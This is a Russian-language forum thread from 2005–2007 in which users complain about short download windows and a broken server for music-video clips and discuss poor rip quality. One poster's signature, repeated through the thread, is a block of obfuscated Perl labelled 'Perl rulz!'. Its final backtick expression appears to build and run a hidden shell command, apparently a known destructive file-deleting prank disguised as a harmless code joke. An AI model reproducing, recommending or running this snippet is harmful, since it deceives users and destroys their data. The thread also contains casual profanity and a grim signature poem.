Жалуюсь, но всё равно сайт это обожаю. почему так мало времени даёться на скачивание и так мало можно скачать??? _________________ How do I feel?
What do I say?
Fuck U -it all goes away!
Добавлено: Вт Окт 25, 2005 12:42 am Заголовок сообщения:
мало времени, т.к. на сервере мало места, все файлы не помещаются, приходится удалять, чтобы было новое
.....такова жизнь, кто не успел, тот сам виноват _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
$!=~/(.)(.).(.)(.)(.)(.)..(.)(.)(.)..(.)......(.)/,$"),$=++;$.++;$.++;
$_++;$_++;($_,$\,$,)=($~.$"."$;$/$%[$?]$_$\$,$:$%[$?]",$"&$~,$#,);$,++
;$,++;$^|=$";`$_$\$,$/$:$;$~$*$%[$?]$.$~$*${#}$%[$?]$;$\$"$^$~$*.>&$=`
Perl rulz!
Добавлено: Вс Сен 16, 2007 4:43 pm Заголовок сообщения:
Я вот не могу скачать клип Empty Walls.Пишет,что не удалось установить соединение. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Вс Сен 16, 2007 5:01 pm Заголовок сообщения:
у всех, я сам не знаю чо с серваком, он в принципе пашет но хттп запросы блочит _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Вс Сен 16, 2007 5:20 pm Заголовок сообщения:
ALuserX
Скажешбкогда ситуация нормализуется,а то посмотреть очень охота. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Вс Сен 16, 2007 5:52 pm Заголовок сообщения:
ALuserX
Отлично!
Maynard
Считай меня каким-хочешь ламаком,но что такое HQ версия? _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Вс Сен 16, 2007 8:10 pm Заголовок сообщения:
кстати там качество через жопу на самом деле))) ктото не умеет рипать))) при огромном разрешении низкий битрейт, при малейшем движении в клипе все на полоски разлетается блять))) _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Вс Сен 16, 2007 8:55 pm Заголовок сообщения:
Все равно лучше чем сейчас имеем
В таком случае, имеет смысл пережать в более меньший вес, если получится _________________ Fortuna non penis in manus non recipe
Добавлено: Вс Сен 16, 2007 9:12 pm Заголовок сообщения:
Maynard
смысла нет, разве что разрешение уменьшить, но это у меня не получается как надо _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!
Добавлено: Вс Сен 16, 2007 10:00 pm Заголовок сообщения:
Maynard писал(а):
имеет смысл пережать в более меньший вес
Имеет,имеет!Помните о тех,кто платит бешеные деньги за интернет. _________________ Жаркая пустыня Дагестана.За высоким барханом лежит труп.Это мой,мой,мой труп лежит.Из свежей раны течёт кровь.Это моя,моя,моя кровь течёт.И в жаркой пустыне Дагестана за высоким барханом чей-то труп знакомый валяется!Это мой труп!Нет.Это твой труп?Нет.Это наш труп!И из ещё дымящейся раны течёт алая кровь.
Добавлено: Вс Сен 16, 2007 10:23 pm Заголовок сообщения:
а у меня хуй! _________________ `$=`;$_=\%!;($_)=/(.)/;$==++$|;($.,$/,$,,$\,$",$;,$^,$#,$~,$*,$:,@% )=(
Perl rulz!